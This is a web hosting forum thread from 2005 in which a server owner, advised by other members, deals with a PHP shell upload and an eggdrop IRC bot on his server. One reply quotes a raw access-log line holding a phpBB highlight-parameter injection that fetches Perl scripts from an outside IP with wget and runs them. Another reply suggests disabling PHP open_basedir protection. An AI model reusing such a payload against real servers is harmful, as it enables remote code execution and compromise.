Results 1 to 18 of 18

Thread: recent hack

  1. #1

    recent hack

    Hi, somebody using an image uploading script put a php script called 'php shell' script and gain access to our server i wonder how could i know what he did and how much access did he gain?

    There is a process on my server now like this:

    User Domain %CPU %MEM Mysql Processes
    nobody 123.39 3.56 0.0
    Top Process %CPU 42.6 usr/local/apache/bin/httpd -m z
    Top Process %CPU 42.5 usr/local/apache/bin/httpd -m z
    Top Process %CPU 42.4 usr/local/apache/bin/httpd -m z

    Is this normal that a user 'nobody' is doind that much cpu load? thanks.

  2. #2
    Join Date
    Dec 2004
    Location
    New York, NY
    Posts
    10,574
    Any box that is rooted should probably be formatted. Sorry to say
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  3. #3

    ok

    am willing to do that, just how do you think its the best way?

    Do you think that changing my box and using CPANEL ability to copy all acounts from one server to another could be enough?

  4. #4
    Join Date
    Oct 2003
    Posts
    90
    hmmmmmm ... shouldn't that be /usr/local/apache/bin/httpd

  5. #5

    process

    Top Process %CPU 42.6 usr/local/apache/bin/httpd -m z


    I think that process may be a backdoor or something am turn it off for now lets see what happens.

    -- > UPDATE

    Now i know am hacked, i saw some process called 'eggdrop' so is the option to change to another server going to help? even if i use the copy account feature on CPANEL? thanks.
    Last edited by name2me; 04-18-2005 at 05:44 PM.

  6. #6
    Join Date
    Dec 2004
    Location
    New York, NY
    Posts
    10,574

    Re: ok

    Originally posted by name2me
    am willing to do that, just how do you think its the best way?

    Do you think that changing my box and using CPANEL ability to copy all acounts from one server to another could be enough?
    You could always give that a try. Perhaps order a new server in the same data center, transfer all accounts over and close the rooted box. However, be sure to get someone to harden your new server first Also, beware of some errors that may occur using the WHM copy account feature.
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  7. #7
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    The box is not rooted. look at the name the process is running under. it says "nobody". more then likely its an exploited php script.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  8. #8
    Join Date
    Mar 2003
    Location
    New Jersey
    Posts
    1,277
    I've seen this type of thing very frequently lately. as thelinuxguy said, its most likely an exploited php script. Make sure PHP is up to date, and your phpBB installations are up to date. Kill the process, secure your /tmp directory (watch for any files/activity/existence of /tmp/.temp) and you should be able to prevent it from happening.

    Formatting is not always required, in this type of situation.

  9. #9
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    With that said, if you move to another box, it will most likely happen again because you didnt find out how it was happening and patch it up, and end up going in a nonstop loop.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  10. #10
    Join Date
    Nov 2004
    Location
    England
    Posts
    513
    Suspend all your services, firewall the box, and figure out what's going on. As thelinuxguy says, it doens't look too bad - yet. But with an eggdrop going on, who knows.

  11. #11
    Join Date
    Dec 2004
    Location
    New York, NY
    Posts
    10,574
    Hmm...

    Now that I look at it again. All I could say is get someone professional to take a look at the box. Having eggdrop running is definately not good especially if the data centre does not allow IRC.
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  12. #12
    Join Date
    Mar 2003
    Location
    California USA
    Posts
    13,294
    Originally posted by vidahost
    Suspend all your services, firewall the box, and figure out what's going on. As thelinuxguy says, it doens't look too bad - yet. But with an eggdrop going on, who knows.
    i doubt its rooted. eggdrop wont usually run as root
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  13. #13
    Join Date
    Apr 2005
    Location
    Vancouver B.C.
    Posts
    51
    eggdrop's dont run under root or under su account. That goes for emech's too.

  14. #14

    tech support

    Tech support from my provider said:

    "It is from the /var/tmp which turns out not to be linked to /tmp which have protections in to prevent those from happening. I have removed it and fixed it so it will not happen again.
    It is not a compromise of the system or anything, just one of the annoying exploits thugh someone PHP's page to upload the PHP shell to run."

    I think everything is fine now

    Thanks everybody you were right and i learned some stuff.

  15. #15

    does any one know?

    Now some scripts do not work specially the ones that read files from directories BUT in the same account, how could i specify to php let that accounts to do that??

  16. #16
    Join Date
    Dec 2004
    Location
    New York, NY
    Posts
    10,574
    You may have PHP Open Base Dir protection on. Turn that off and see if it helps.
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  17. #17
    Join Date
    Mar 2003
    Location
    New Jersey
    Posts
    1,277
    Yes, we know the problem, upgrade PHP and PHPBB. If you have a global access log, you will see something like :

    /hsphere/local/home/xxxxxxx/xxxxx.com/phpBB2/viewtopic.php 203.98.133.222 - - [18/Apr/2005
    :04:28:58 -0400] "GET /phpBB2/viewtopic.php?p=27741&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd
    %20.temp;wget%20http://61.85.234.215/.zk/msn.txt;wget%20http://61.85.234.215/.zk/coll.txt;wget%20http://61.85.234.215/.zk/g.t
    xt;perl%20msn.txt;rm%20msn.txt;perl%20coll.txt;rm%20coll.txt;perl%20g.txt;rm%20g.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&high
    light=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200
    77599 "-" "LWP:imple/5.65"

  18. #18

    upgrading

    Using cpanel web host manager how can i upgrade php and phpbb? thanks that seems to be the errors showing

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •